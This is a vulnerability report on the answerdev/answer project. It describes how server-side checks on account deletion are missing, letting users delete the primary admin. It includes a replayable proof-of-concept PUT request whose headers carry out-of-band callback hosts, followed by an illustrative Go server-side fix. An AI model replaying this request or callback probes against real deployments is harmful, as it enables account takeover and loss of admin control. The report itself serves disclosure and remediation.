Insecure Business Logic - Client Side Enforcement Bypass on User Account Deletion in answerdev/answer
Reported on
Feb 22nd 2023
Description
The application enforces the restriction on account deletion only on the client side, with a popup stating that the admin account cannot be deleted. Additionally, regular users have no option in the interface to delete their own account.
Both an administrative user and a regular-privileged user are able to bypass this restriction by intercepting the request and replaying it through Burp Repeater; the server does not re-check the rule the popup implies. See screenshot evidence of this vulnerability here - https://www.notion.so/themayor/Insecure-Business-Logic-Client-Side-Enforcement-Bypass-on-Admin-Deletion-f814c7e5619542fca3ad6299742c4fdc?pvs=4
Proof of Concept
PUT /answer/admin/api/user/status HTTP/1.1
Host: 192.168.1.66:9080
Content-Length: 46
Accept-Language: en_US
Authorization: 205834a8-b25a-11ed-99de-0242ac110002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@mkaebgzpeo8uptteqrg2263p5gb8e1gp5.oastify.com
Content-Type: application/json
Accept: */*
Origin: http://192.168.1.66:9080
Referer: http://1xztovc4r3l9286t36thflg4ivonrgv4k.oastify.com/ref
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: no-transform
{
"user_id":"1",
"status":"deleted"
}
Response
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Wed, 22 Feb 2023 02:51:43 GMT
Content-Length: 65
Connection: close
{"code":200,"reason":"base.success","msg":"Success.","data":null}
Impact
Enforcing user actions only on the client side allows users to modify requests in transit from the browser to the server. In this case, deleting an account in this way contradicts the application's intended logic: the primary admin is meant to be protected from deletion, and a regular user is not meant to have the option at all.
Deletion of the primary administrator account removes all administrative control of the application if no other administrative account exists.
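The fix for this class of issue is to make the server the authority for the rule, independent of whatever the UI shows. The following Go handler is an added illustration written for this report, not code from answerdev/answer: it models the same PUT /answer/admin/api/user/status request and JSON body from the proof of concept, and applies the policy on the server side. The user type, the token table, the assumption that the primary administrator is user_id "1", and the accepted status values are all constructed for the example.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// User is a hypothetical account model for this example, not the project's own type.
type User struct {
	ID      string
	IsAdmin bool
}

// Assumption: the first administrator (user_id "1" in the report) is the primary admin.
const primaryAdminID = "1"

// statusRequest mirrors the JSON body shown in the proof of concept.
type statusRequest struct {
	UserID string `json:"user_id"`
	Status string `json:"status"`
}

var (
	ErrForbidden    = errors.New("caller may not change account status")
	ErrPrimaryAdmin = errors.New("primary administrator account cannot be deleted")
	ErrBadStatus    = errors.New("unknown status value")
)

// AuthorizeStatusChange enforces, on the server, the rule the UI only hinted at:
// only administrators may change a status, and nobody may delete the primary admin.
func AuthorizeStatusChange(actor User, targetID, status string) error {
	switch status {
	case "normal", "suspended", "deleted":
	default:
		return ErrBadStatus
	}
	if !actor.IsAdmin {
		return ErrForbidden
	}
	if status == "deleted" && targetID == primaryAdminID {
		return ErrPrimaryAdmin
	}
	return nil
}

// sessions is a constructed token table standing in for a real session store.
var sessions = map[string]User{
	"admin-token": {ID: "1", IsAdmin: true},
	"user-token":  {ID: "7", IsAdmin: false},
}

func writeJSON(w http.ResponseWriter, code int, msg string) {
	w.Header().Set("Content-Type", "application/json; charset=utf-8")
	w.WriteHeader(code)
	json.NewEncoder(w).Encode(map[string]any{"code": code, "msg": msg})
}

// StatusHandler serves PUT /answer/admin/api/user/status with the server-side check.
func StatusHandler(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPut {
		writeJSON(w, http.StatusMethodNotAllowed, "method not allowed")
		return
	}
	actor, ok := sessions[r.Header.Get("Authorization")]
	if !ok {
		writeJSON(w, http.StatusUnauthorized, "invalid session")
		return
	}
	var req statusRequest
	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
		writeJSON(w, http.StatusBadRequest, "malformed body")
		return
	}
	if err := AuthorizeStatusChange(actor, req.UserID, req.Status); err != nil {
		code := http.StatusForbidden
		if errors.Is(err, ErrBadStatus) {
			code = http.StatusBadRequest
		}
		writeJSON(w, code, err.Error())
		return
	}
	// A real handler would persist the new status here; the decision is what matters.
	writeJSON(w, http.StatusOK, "Success.")
}

// Call sends a request in-process and returns the HTTP status code,
// so the policy can be exercised without starting a server.
func Call(token, body string) int {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest(http.MethodPut, "/answer/admin/api/user/status", strings.NewReader(body))
	req.Header.Set("Authorization", token)
	StatusHandler(rec, req)
	return rec.Code
}

func main() {
	fmt.Println(Call("admin-token", `{"user_id":"1","status":"deleted"}`)) // 403: primary admin protected
	fmt.Println(Call("user-token", `{"user_id":"7","status":"deleted"}`))  // 403: regular user not allowed
	fmt.Println(Call("admin-token", `{"user_id":"7","status":"deleted"}`)) // 200: admin deleting another user
}
```

The important property is that the decision lives in one function the handler always calls, so a replayed or edited request hits the same rule as a request produced by the intended UI. The returned 403 should also be logged with the actor and target IDs, since a request to delete user_id "1" that never appears in the normal interface is a clear signal of tampering.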
Occurrences
backyard_user_schema.go L8
This is probably not the correct location in the code, but was where I could find some of the handling for user account status modifiers.
References
SECURITY.md